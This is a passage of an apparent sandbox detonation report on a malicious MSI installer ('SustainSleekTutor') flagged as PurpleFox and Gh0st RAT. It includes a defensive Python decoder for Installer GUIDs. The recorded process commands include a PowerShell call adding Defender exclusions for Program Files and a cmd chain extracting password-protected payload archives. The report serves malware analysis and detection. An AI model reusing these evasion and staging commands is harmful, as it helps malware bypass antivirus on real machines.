Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Version = "100794368" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\PackageName = "92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\ProductName = "SustainSleekTutor" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\PackageCode = "422D740D8F2748241AF491420E7509A6" C:\Windows\system32\msiexec.exe N/A
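The 32-character key names above are not hashes. Windows Installer stores the package's ProductCode and UpgradeCode GUIDs in a "packed" form (each of the first three groups reversed as a string, the remaining sixteen hex digits swapped pairwise) as key names under HKLM\SOFTWARE\Classes\Installer, and Version is one DWORD with the major version in the top byte, the minor in the next and the build in the low word. Decoding them gives the identifiers a defender needs to find this product on other hosts: the unpacked ProductCode names the package's Uninstall key, and the packed form also names its UserData\S-1-5-18\Products entry for a per-machine install, which is what writes under HKLM\SOFTWARE\Classes\Installer indicate. The decoder below is an added example written for this page, not sandbox output; the ProductCode and UpgradeCode it prints are derived from the key names on this page, and the registry locations it lists are the standard Windows Installer ones (places to check on a live host, not locations observed in this run). Two caveats for reading the rest of this section: the Installer\Products writes, the drive probing and the long list of privileges msiexec.exe enables under "Suspicious use of AdjustPrivilegeToken" are consistent with the Windows Installer service running as LocalSystem and identify the package rather than the malice; and the Uninstall keys that the bundled Telegram Desktop 5.2.3 installer (tsetup.tmp) wrote under HKEY_USERS\.DEFAULT show that it, too, ran as LocalSystem, because HKCU resolves to HKU\.DEFAULT for that account, so the bundled installer was launched from the installer's SYSTEM context rather than by the logged-on user.

```python
"""Decode the Windows Installer registry artefacts recorded under "Modifies
registry class": the 32-hex key names are ProductCode/UpgradeCode GUIDs in the
Installer's packed form, and Version is a packed DWORD."""
import re

PACKED_RE = re.compile(r"^[0-9A-Fa-f]{32}$")
GUID_RE = re.compile(
    r"^\{?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}?$"
)

# Values taken from this report's "Modifies registry class" table.
PRODUCT_KEY = "D79DD49E5C47660498C5E1D7A560895F"
UPGRADE_KEY = "0D716B2B7A13A72439FD62E0DFA6E582"
VERSION_DWORD = 100794368
LANGUAGE_ID = 1033  # en-US


def unpack_guid(packed: str) -> str:
    """Packed Installer GUID -> {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}.

    The first three groups (8, 4 and 4 hex digits) are stored reversed as
    strings; the remaining 16 digits are stored with each pair swapped.
    """
    if not PACKED_RE.match(packed):
        raise ValueError(f"not a packed GUID: {packed!r}")
    p = packed.upper()
    a, b, c = p[0:8][::-1], p[8:12][::-1], p[12:16][::-1]
    tail = "".join(p[i:i + 2][::-1] for i in range(16, 32, 2))
    return f"{{{a}-{b}-{c}-{tail[:4]}-{tail[4:]}}}"


def pack_guid(guid: str) -> str:
    """Inverse of unpack_guid: the same swaps applied to the hyphen-less GUID."""
    if not GUID_RE.match(guid):
        raise ValueError(f"not a GUID: {guid!r}")
    g = guid.strip("{}").replace("-", "").upper()
    a, b, c = g[0:8][::-1], g[8:12][::-1], g[12:16][::-1]
    tail = "".join(g[i:i + 2][::-1] for i in range(16, 32, 2))
    return a + b + c + tail


def decode_version(dword: int) -> str:
    """Installer Version DWORD: major in the top byte, minor next, build in the low word."""
    return f"{dword >> 24}.{(dword >> 16) & 0xFF}.{dword & 0xFFFF}"


def installer_artifacts() -> dict:
    """Human-readable identifiers for this package plus the standard registry
    locations a per-machine Windows Installer product leaves them in
    (standard locations, assumed rather than observed in this run)."""
    product = unpack_guid(PRODUCT_KEY)
    return {
        "ProductCode": product,
        "UpgradeCode": unpack_guid(UPGRADE_KEY),
        "ProductVersion": decode_version(VERSION_DWORD),
        "Language": LANGUAGE_ID,
        "registry_locations": [
            rf"HKLM\SOFTWARE\Classes\Installer\Products\{PRODUCT_KEY}",
            rf"HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\{UPGRADE_KEY}",
            rf"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\{PRODUCT_KEY}\InstallProperties",
            rf"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{product}",
        ],
    }


if __name__ == "__main__":
    for name, value in installer_artifacts().items():
        print(f"{name}: {value}")
```

For this package the decoder yields ProductCode {E94DD97D-74C5-4066-895C-1E7D5A0698F5}, UpgradeCode {B2B617D0-31A7-427A-93DF-260EFD6A5E28} and ProductVersion 6.2.0 (0x06020000), which match the ProductName "SustainSleekTutor" and PackageName recorded above and can be searched for directly in the MSI's Property table or in the Uninstall hive of any host suspected of having run it. The round trip through pack_guid is there so a GUID pulled from an Uninstall key can be turned back into the Installer\Products key name.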

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A (2 events)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A (50 events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A (2 events)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1288 wrote to memory of 2964 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2964 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2964 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2160 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 2160 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 2160 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 992 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2160 wrote to memory of 992 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2160 wrote to memory of 992 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D0" "00000000000004C4"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 9629F5D0995E5F15862E05B252C1310E M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\SustainSleekTutor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 127 -file file3 -mode mode3

C:\Program Files\SustainSleekTutor\tsetup.exe

"C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp" /SL5="$801FC,44246395,814592,C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"

Network

Files

memory/1288-12-0x0000000000210000-0x0000000000220000-memory.dmp

memory/2964-17-0x000000001B450000-0x000000001B732000-memory.dmp

memory/2964-18-0x0000000002040000-0x0000000002048000-memory.dmp

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg

C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf

C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe

C:\Program Files\SustainSleekTutor\tsetup.exe

memory/640-48-0x0000000000400000-0x00000000004D4000-memory.dmp

C:\Config.Msi\f76d2bc.rbs

\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp

C:\Windows\Installer\f76d2ba.msi

memory/2136-65-0x000000002B0F0000-0x000000002B11F000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\Saved Games\desktop.ini

memory/640-78-0x0000000000400000-0x00000000004D4000-memory.dmp

memory/848-79-0x0000000000400000-0x0000000000710000-memory.dmp

memory/848-81-0x0000000000400000-0x0000000000710000-memory.dmp

memory/848-102-0x0000000000400000-0x0000000000710000-memory.dmp

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

memory/2960-115-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/2960-114-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/640-122-0x0000000000400000-0x00000000004D4000-memory.dmp

memory/848-119-0x0000000000400000-0x0000000000710000-memory.dmp

memory/2960-135-0x0000000000310000-0x000000000031A000-memory.dmp

memory/2960-134-0x0000000000310000-0x000000000031A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab850A.tmp

memory/2960-193-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/2960-192-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/2960-198-0x0000000000310000-0x000000000031A000-memory.dmp

memory/2960-199-0x0000000000310000-0x000000000031A000-memory.dmp

memory/2960-213-0x0000000000310000-0x000000000031A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 15:17

Reported

2024-11-09 15:20

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

Signatures

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\J: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\W: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\O: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Y: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Q: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\V: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
